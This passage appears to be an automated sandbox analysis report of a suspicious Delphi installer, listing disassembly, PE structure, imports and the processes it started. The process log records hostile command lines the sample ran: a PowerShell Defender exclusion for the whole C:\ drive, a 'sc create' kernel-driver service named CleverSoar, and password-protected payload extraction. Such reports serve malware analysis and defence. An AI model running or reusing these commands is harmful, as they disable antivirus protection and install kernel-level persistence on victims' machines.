                          add esp, FFFFFFA4h
                          push ebx
                          push esi
                          push edi
                          xor eax, eax
                          mov dword ptr [ebp-3Ch], eax
                          mov dword ptr [ebp-40h], eax
                          mov dword ptr [ebp-5Ch], eax
                          mov dword ptr [ebp-30h], eax
                          mov dword ptr [ebp-38h], eax
                          mov dword ptr [ebp-34h], eax
                          mov dword ptr [ebp-2Ch], eax
                          mov dword ptr [ebp-28h], eax
                          mov dword ptr [ebp-14h], eax
                          mov eax, 004A2EBCh
                          call 00007FE018B19205h
                          xor eax, eax
                          push ebp
                          push 004A8AC1h
                          push dword ptr fs:[eax]
                          mov dword ptr fs:[eax], esp
                          xor edx, edx
                          push ebp
                          push 004A8A7Bh
                          push dword ptr fs:[edx]
                          mov dword ptr fs:[edx], esp
                          mov eax, dword ptr [004B0634h]
                          call 00007FE018BAAB8Bh
                          call 00007FE018BAA6DEh
                          lea edx, dword ptr [ebp-14h]
                          xor eax, eax
                          call 00007FE018BA53B8h
                          mov edx, dword ptr [ebp-14h]
                          mov eax, 004B41F4h
                          call 00007FE018B132B3h
                          push 00000002h
                          push 00000000h
                          push 00000001h
                          mov ecx, dword ptr [004B41F4h]
                          mov dl, 01h
                          mov eax, dword ptr [0049CD14h]
                          call 00007FE018BA66E3h
                          mov dword ptr [004B41F8h], eax
                          xor edx, edx
                          push ebp
                          push 004A8A27h
                          push dword ptr fs:[edx]
                          mov dword ptr fs:[edx], esp
                          call 00007FE018BAAC13h
                          mov dword ptr [004B4200h], eax
                          mov eax, dword ptr [004B4200h]
                          cmp dword ptr [eax+0Ch], 01h
                          jne 00007FE018BB18FAh
                          mov eax, dword ptr [004B4200h]
                          mov edx, 00000028h
                          call 00007FE018BA6FD8h
                          mov edx, dword ptr [004B4200h]

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          .rsrc0xcb0000x110000x110000298257a2fdc6a5af46f0d4f3dd0d7d8False0.1877154181985294data3.7229458291165596IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                          RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                          RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                          RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                          RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                          RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                          RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                          RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                          RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                          RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                          RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                          RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                          RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                          RT_STRING0xd8e000x3f8data0.3198818897637795
                          RT_STRING0xd91f80x2dcdata0.36475409836065575
                          RT_STRING0xd94d40x430data0.40578358208955223
                          RT_STRING0xd99040x44cdata0.38636363636363635
                          RT_STRING0xd9d500x2d4data0.39226519337016574
                          RT_STRING0xda0240xb8data0.6467391304347826
                          RT_STRING0xda0dc0x9cdata0.6410256410256411
                          RT_STRING0xda1780x374data0.4230769230769231
                          RT_STRING0xda4ec0x398data0.3358695652173913
                          RT_STRING0xda8840x368data0.3795871559633027
                          RT_STRING0xdabec0x2a4data0.4275147928994083
                          RT_RCDATA0xdae900x10data1.5
                          RT_RCDATA0xdaea00x310data0.6173469387755102
                          RT_RCDATA0xdb1b00x2cdata1.1818181818181819
                          RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                          RT_VERSION0xdb2980x584dataEnglishUnited States0.2776203966005666
                          RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163

                          Imports

                          DLLImport
                          kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                          comctl32.dllInitCommonControls
                          user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                          oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                          advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey

                          Exports

                          NameOrdinalAddress
                          __dbk_fcall_wrapper20x40fc10
                          dbkFCallWrapperAddr10x4b063c

                          Possible Origin

                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States

                          Network Behavior

                          No network behavior found

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:22:43:17
                          Start date:24/12/2024
                          Path:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe"
                          Imagebase:0xa10000
                          File size:9'897'435 bytes
                          MD5 hash:1892CF920FFE70868B967804D9222B14
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:1
                          Start time:22:43:17
                          Start date:24/12/2024
                          Path:C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp" /SL5="$10424,8943036,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe"
                          Imagebase:0x590000
                          File size:3'366'912 bytes
                          MD5 hash:F71908CEAB1076D5D4250CBFCB02E6B2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:2
                          Start time:22:43:18
                          Start date:24/12/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:3
                          Start time:22:43:18
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:4
                          Start time:22:43:21
                          Start date:24/12/2024
                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Imagebase:0x7ff693ab0000
                          File size:496'640 bytes
                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                          Has elevated privileges:true
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          General

                          Target ID:5
                          Start time:22:43:26
                          Start date:24/12/2024
                          Path:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" /VERYSILENT
                          Imagebase:0xa10000
                          File size:9'897'435 bytes
                          MD5 hash:1892CF920FFE70868B967804D9222B14
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:false

                          General

                          Target ID:6
                          Start time:22:43:26
                          Start date:24/12/2024
                          Path:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp" /SL5="$302A2,8943036,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" /VERYSILENT
                          Imagebase:0x9e0000
                          File size:3'366'912 bytes
                          MD5 hash:F71908CEAB1076D5D4250CBFCB02E6B2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Antivirus matches:
                          • Detection: 1%, Virustotal, Browse
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:7
                          Start time:22:43:29
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:8
                          Start time:22:43:29
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:9
                          Start time:22:43:29
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:10
                          Start time:22:43:29
                          Start date:24/12/2024
                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                          Wow64 process (32bit):true
                          Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                          Imagebase:0x6d0000
                          File size:831'200 bytes
                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 0%, ReversingLabs
                          • Detection: 0%, Virustotal, Browse
                          Has exited:true

                          General

                          Target ID:11
                          Start time:22:43:30
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:12
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                          Wow64 process (32bit):true
                          Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                          Imagebase:0x6d0000
                          File size:831'200 bytes
                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:13
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:14
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:15
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:16
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:17
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:18
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:19
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:20
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:21
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:22
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:23
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:24
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:25
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:27
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:28
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:29
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:30
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:31
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:32
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:33
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:34
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:35
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:36
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:37
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:38
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:39
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
